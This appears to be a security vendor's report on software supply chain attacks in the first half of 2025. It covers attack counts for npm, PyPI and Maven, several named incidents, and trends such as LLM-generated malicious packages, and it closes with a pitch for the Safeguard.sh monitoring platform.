The first half of 2025 has been rough. We tracked 847 confirmed software supply chain attacks between January and June -- a 34% increase over H1 2024. But the raw numbers do not tell the whole story. The nature of these attacks is shifting in ways that matter for how we defend against them.
Here is what we found.
The Numbers
Let us start with what happened:
- 847 confirmed supply chain attacks across all ecosystems
- npm remained the most targeted package registry (312 attacks), followed by PyPI (198) and Maven Central (89)
- Average time to detection dropped to 4.2 days from 6.8 days in H1 2024 -- a genuine improvement
- 62% of attacks used typosquatting or dependency confusion as the initial vector
- 23% involved compromised maintainer accounts, up from 14% in 2024
Ecosystem Breakdown
npm: Volume Leader, Sophistication Laggard
npm continues to absorb the most attacks by sheer volume, but most npm attacks remain unsophisticated. The typical pattern is still typosquatting -- registering packages with names similar to popular libraries and waiting for developers to make typos. We saw 189 pure typosquatting attacks on npm in H1 2025.
What is changing is the post-compromise payload. Historically, malicious npm packages would exfiltrate environment variables and call it a day. In 2025, we are seeing more packages that establish persistent backdoors, modify other installed packages, and even tamper with build outputs. The initial access is simple, but the exploitation is getting more advanced.
PyPI: The AI/ML Target
PyPI attacks grew 67% year-over-year, and the reason is obvious: the AI/ML boom. Packages mimicking popular machine learning libraries (variations on torch, transformers, langchain) accounted for 41% of PyPI-targeted attacks. Attackers know that ML engineers often install packages quickly to experiment, and that ML environments frequently have access to GPU resources and sensitive training data.
We documented at least 12 cases where compromised PyPI packages were specifically designed to exfiltrate model weights and training data -- a new category of supply chain attack that barely existed a year ago.
Maven Central and Go Modules: Enterprise Targets
Attacks on Maven Central and Go modules are fewer in number but significantly more targeted. These are not spray-and-pray typosquatting campaigns. They tend to be carefully constructed packages that mimic internal enterprise library naming conventions, suggesting attackers are doing reconnaissance on specific organizations before launching dependency confusion attacks.
Notable Incidents
The node-fetch-native Compromise (February 2025)
A maintainer account for a widely-used Node.js HTTP library was compromised through a social engineering campaign that lasted three months. The attacker gradually built trust in the project's community before gaining commit access. The malicious code was subtle -- it only activated when the package was used in CI/CD environments, and it exfiltrated pipeline secrets to a Tor-routed endpoint.
This incident affected an estimated 14,000 downstream projects before detection.
The PyTorch Extension Campaign (March-April 2025)
A coordinated campaign published 47 malicious packages over six weeks, all mimicking PyTorch extensions and CUDA utilities. The packages functioned correctly for their advertised purpose while simultaneously mining cryptocurrency and exfiltrating GPU utilization data. Several packages accumulated over 50,000 downloads before being flagged.
The Maven Central Namespace Hijack (May 2025)
A sophisticated attack exploited the Maven Central namespace claiming process to publish packages under a legitimate organization's group ID. The attacker registered an expired domain that was previously associated with an open-source project's maintainers, then used it to verify ownership of the Maven namespace. This is a systemic issue with how some registries tie identity to DNS ownership.
Emerging Trends
AI-Assisted Attack Creation
We have strong evidence that attackers are using large language models to generate malicious packages at scale. The telltale signs include: packages with high-quality README files and documentation (unusual for typosquatting attempts), functional code that closely mimics the legitimate package's API surface, and obfuscation techniques that vary slightly across each package in a campaign -- consistent with LLM-generated variations.
Build System Targeting
Attacks are moving earlier in the pipeline. We tracked 34 incidents targeting build tools and plugins directly -- Webpack plugins, Gradle plugins, GitHub Actions -- rather than application dependencies. Compromising a build tool gives attackers code execution during the build process itself, which often has access to signing keys, deployment credentials, and artifact repositories.
Supply Chain Attacks as a Service
In underground forums, we identified at least three services offering supply chain attack capabilities for hire. These range from maintaining networks of typosquatting packages across multiple registries to providing compromised maintainer accounts. The commoditization of supply chain attacks lowers the barrier to entry significantly.
What is Working
Not everything is bad news. Detection is genuinely improving.
Package registries are getting better at automated detection. npm's malware detection caught 78% of typosquatting attempts within 24 hours, up from 52% in 2024. PyPI's trusted publisher program is reducing the attack surface for account compromise.
Tools like Safeguard that monitor SBOMs continuously are catching compromised packages faster. Organizations using automated SBOM monitoring detected supply chain compromises an average of 3.1 days faster than those relying on periodic scans.
Sigstore adoption is accelerating. Packages with verified provenance through Sigstore were involved in zero successful supply chain attacks in H1 2025. Provenance works -- the challenge is adoption.
How Safeguard.sh Helps
Safeguard.sh provides continuous monitoring of your software supply chain. Our platform generates and tracks SBOMs, maps vulnerabilities to your actual dependency graph, and runs policy gates that can block deployments when supply chain indicators of compromise are detected. With the Safeguard MCP Server, your development team gets real-time visibility into supply chain risks without leaving their development environment. The first half of 2025 showed that supply chain attacks are not slowing down -- but neither are the defenses.